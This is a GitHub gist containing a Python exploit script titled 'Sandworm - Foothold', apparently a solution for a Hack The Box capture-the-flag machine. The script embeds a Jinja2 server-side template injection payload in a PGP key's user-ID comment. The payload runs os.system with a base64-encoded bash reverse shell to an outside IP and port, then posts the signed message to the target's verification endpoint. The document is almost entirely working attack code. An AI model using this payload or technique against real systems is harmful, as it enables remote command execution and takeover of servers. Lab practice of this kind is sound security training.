Skip to content

Instantly share code, notes, and snippets.

@xl00t
Created June 19, 2023 00:16
Show Gist options
  • Save xl00t/e4b0432e7c90d5df9852f2e86fa3430c to your computer and use it in GitHub Desktop.
Save xl00t/e4b0432e7c90d5df9852f2e86fa3430c to your computer and use it in GitHub Desktop.
Sandworm - Foothold
#!/usr/bin/env python3
import requests
import pgpy
from pgpy.constants import PubKeyAlgorithm, KeyFlags, HashAlgorithm, SymmetricKeyAlgorithm, CompressionAlgorithm
from urllib3.exceptions import InsecureRequestWarning
import base64
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def createPGPKeysPayload(ssti_payload):
key = pgpy.PGPKey.new(PubKeyAlgorithm.RSAEncryptOrSign, 4096)
uid = pgpy.PGPUID.new('xl00t', comment=ssti_payload, email='xl00t@htb.local')
key.add_uid(uid, usage={KeyFlags.Sign, KeyFlags.EncryptCommunications, KeyFlags.EncryptStorage},
hashes=[HashAlgorithm.SHA256, HashAlgorithm.SHA384, HashAlgorithm.SHA512, HashAlgorithm.SHA224],
ciphers=[SymmetricKeyAlgorithm.AES256, SymmetricKeyAlgorithm.AES192, SymmetricKeyAlgorithm.AES128],
compression=[CompressionAlgorithm.ZLIB, CompressionAlgorithm.BZ2, CompressionAlgorithm.ZIP, CompressionAlgorithm.Uncompressed])
ct_message = pgpy.PGPMessage.new("useless",
cleartext=True)
ct_message |= key.sign(ct_message)
return (ct_message, key.pubkey)
def createRevShell(ip, port):
b64 = base64.b64encode(f"bash -i >& /dev/tcp/{ip}/{port} 0>&1".encode()).decode()
return f"echo {b64} | base64 -d | bash"
def main():
revshell = createRevShell('10.10.14.253', 9001)
ssti_payload = f"{{{{ self._TemplateReference__context.cycler.__init__.__globals__.os.system('{revshell}') }}}}"
signed_message, public_key = createPGPKeysPayload(ssti_payload)
payload = {
"signed_text": str(signed_message),
"public_key": str(public_key)
}
r = requests.post("https://ssa.htb/process", data=payload, verify=False)
print(r.text)
if __name__ == '__main__':
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment